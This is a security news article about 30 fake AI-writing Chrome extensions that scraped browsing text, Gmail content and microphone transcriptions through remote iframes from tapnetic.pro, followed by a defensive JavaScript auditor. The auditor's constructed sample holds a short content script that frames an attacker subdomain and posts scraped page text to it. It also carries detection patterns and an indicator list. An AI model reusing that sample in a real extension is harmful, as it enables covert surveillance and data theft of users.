
Mass Surveillance: Fake AI Extensions Compromise Chrome Users
Cybersecurity researchers have discovered a malicious campaign built on Chrome browser extensions posing as artificial intelligence assistants. Roughly 260,000 users were affected by 30 extensions that, despite different names and branding, share the same internal code and backend infrastructure.
The extensions were installed on the promise of help with writing texts and emails. They presented a convincing facade of legitimacy and requested broad permissions over the pages a user visits. Those permissions were plausible for the advertised functionality, but they are also exactly what allowed the extensions to read the content of every page a victim opened.
Deceptive Operation
The extensions were marketed as AI assistants offering a range of writing features. They accumulated more than 260,000 installations, many of them helped along by a "Featured" badge in Google's official Chrome Web Store, which users read as a sign that Google has vetted the extension and which raises trust accordingly.
The attackers used a technique known as a remote iframe: the extension injects an embedded frame into the page whose source is a document on an attacker-controlled server, in this case tapnetic.pro. Because the frame's content is fetched at load time rather than shipped inside the extension package, the operators could change what ran in victims' browsers at any moment without publishing an update that the Chrome Web Store would review.
Data Capture and Espionage
The data harvested included the text of pages the victim was browsing, extracted with Mozilla's Readability library (the same code behind Firefox's Reader View, which strips a page down to its readable article text). Because the extension ran on every site, the theft extended to internal company pages and to authenticated systems the victim was logged into.
The extension could also switch on the victim's microphone through the Web Speech API, which returns transcriptions of speech, allowing nearby conversations to be captured and catalogued without the user's consent.
Gmail Espionage
Half of the extensions carried a module dedicated to spying on Gmail. Its scripts were activated as soon as the page began to load, letting the attackers read the content of the emails victims opened.
The module could also watch conversations and drafts as they were being written, sending the captured data to the attackers' servers in real time.
Remote Control Infrastructure
The operation was coordinated from the domain tapnetic.pro, which served as command-and-control (C2) infrastructure. The site presented an ordinary-looking front page but offered no real service; it existed only as cover.
Multiple subdomains were used so that if one was blocked, the others kept working and the operation continued uninterrupted. For defenders, this is why a blocklist should match the apex domain and everything beneath it rather than individual hostnames.
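The traits described in the sections above (broad host permissions, a content script that frames attacker-controlled content, Readability-based page scraping, Web Speech API use, an early-running Gmail script, and an apex C2 domain with rotating subdomains) can be checked statically in an unpacked extension. The following is an added example, not code from the article or from the campaign's extensions; it runs offline on a constructed manifest and content script. The extension name, file names, the fonts.googleapis.com allow-list entry and the subdomain app.tapnetic.pro are hypothetical; only the apex domain tapnetic.pro comes from the article.

```javascript
// Added example, not code from the article or from the campaign itself: a small
// static auditor for an unpacked Chrome extension that flags the traits the
// article describes. Hypothetical: extension name, file names, app.tapnetic.pro.
// From the article: the apex C2 domain tapnetic.pro.

const KNOWN_C2 = ["tapnetic.pro"]; // IOC list; extend with your own
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);
// Hosts an extension may load without comment (illustrative); anything else
// framed or fetched at runtime is remote code the store reviewer never saw.
const ALLOWED_HOSTS = new Set(["fonts.googleapis.com"]);

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

// Match the apex domain and every subdomain beneath it.
function matchesIoc(host) {
  return KNOWN_C2.some((d) => host === d || host.endsWith("." + d));
}

// Manifest-level findings: reach over every site, early-running Gmail scripts.
function auditManifest(manifest) {
  const findings = [];
  const hosts = [...(manifest.host_permissions || []), ...(manifest.permissions || [])];
  if (hosts.some((h) => BROAD_HOSTS.has(h))) {
    findings.push("manifest: broad host access, can read every page the user opens");
  }
  for (const cs of manifest.content_scripts || []) {
    if ((cs.matches || []).some((m) => m.includes("mail.google.com"))) {
      const early = cs.run_at === "document_start" ? " at document_start" : "";
      findings.push(`manifest: ${cs.js.join(",")} runs on Gmail${early}`);
    }
  }
  return findings;
}

// Source-level findings: remote iframes, page-text scraping, microphone use, IOC hits.
function auditScript(name, source) {
  const findings = [];
  const remoteHosts = new Set();
  for (const m of source.matchAll(/https?:\/\/[A-Za-z0-9.-]+[^\s"'`)]*/g)) {
    const h = hostOf(m[0]);
    if (h && !ALLOWED_HOSTS.has(h)) remoteHosts.add(h);
  }
  if (/createElement\(\s*["']iframe["']\s*\)|<iframe/i.test(source) && remoteHosts.size) {
    findings.push(`${name}: injects an iframe sourced from ${[...remoteHosts].join(", ")}`);
  }
  if (/\bReadability\b/.test(source)) {
    findings.push(`${name}: extracts readable page text with Readability`);
  }
  if (/(webkit)?SpeechRecognition\b|getUserMedia\(/.test(source)) {
    findings.push(`${name}: uses speech recognition / microphone`);
  }
  for (const h of remoteHosts) {
    if (matchesIoc(h)) findings.push(`${name}: contacts known C2 domain ${h}`);
  }
  return { findings, remoteHosts: [...remoteHosts] };
}

function auditExtension(manifest, scripts) {
  const findings = auditManifest(manifest);
  const remoteHosts = new Set();
  for (const [name, src] of Object.entries(scripts)) {
    const r = auditScript(name, src);
    findings.push(...r.findings);
    r.remoteHosts.forEach((h) => remoteHosts.add(h));
  }
  const knownC2 = [...remoteHosts].filter(matchesIoc);
  let verdict = "clean";
  if (knownC2.length > 0 || findings.length >= 3) verdict = "malicious";
  else if (findings.length > 0) verdict = "suspicious";
  return { findings, remoteHosts: [...remoteHosts], knownC2, verdict };
}

// Constructed sample (hypothetical extension) carrying the traits described above.
const SAMPLE_MANIFEST = {
  name: "AI Email Writer",
  manifest_version: 3,
  permissions: ["storage", "scripting"],
  host_permissions: ["<all_urls>"],
  content_scripts: [
    { matches: ["<all_urls>"], js: ["content.js"] },
    { matches: ["https://mail.google.com/*"], js: ["gmail.js"], run_at: "document_start" },
  ],
};
const SAMPLE_SCRIPTS = {
  "content.js": `
    const f = document.createElement("iframe");
    f.src = "https://app.tapnetic.pro/assistant?v=" + Date.now(); // hypothetical subdomain
    document.body.appendChild(f);
    const text = new Readability(document.cloneNode(true)).parse().textContent;
    f.contentWindow.postMessage({ text }, "*");
    const rec = new webkitSpeechRecognition();
  `,
  "gmail.js": `document.addEventListener("DOMContentLoaded", () => { /* read mail DOM */ });`,
};

const REPORT = auditExtension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS);
console.log(REPORT.verdict, REPORT.findings);
```

Run it with `node audit.js`; in real use, read `manifest.json` and each listed script from the unpacked extension directory under the browser profile instead of the embedded sample. A static pattern match will miss obfuscated or dynamically assembled URLs, so treat a hit as a lead to confirm by watching the extension's network traffic, not as proof on its own.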
Evading Tactics
The operators were adept at surviving takedowns. Extensions removed from the store quickly reappeared under new names but with the same code, a technique known as extension spraying that makes the operation resilient to any single removal.
Campaign Implications
The combination of factors at work, users' trust in AI extensions, the apparent legitimacy conferred by the Chrome Web Store, and a technical architecture that hides the real functionality on a remote server, produces a campaign that is hard to detect from the extension package alone.
The case raises concerns about the security and privacy of users online and underlines the need for greater vigilance and digital education. For defenders, the practical checks are to review which installed extensions hold permissions over every site, to block the C2 domain together with all of its subdomains at the DNS or proxy level, and in managed environments to allow-list extensions by ID through Chrome's enterprise policy rather than trusting store badges. The evolution of these tactics is a warning about the risks of technology that merely looks secure.
Content selected and edited with AI assistance. Original sources referenced above.


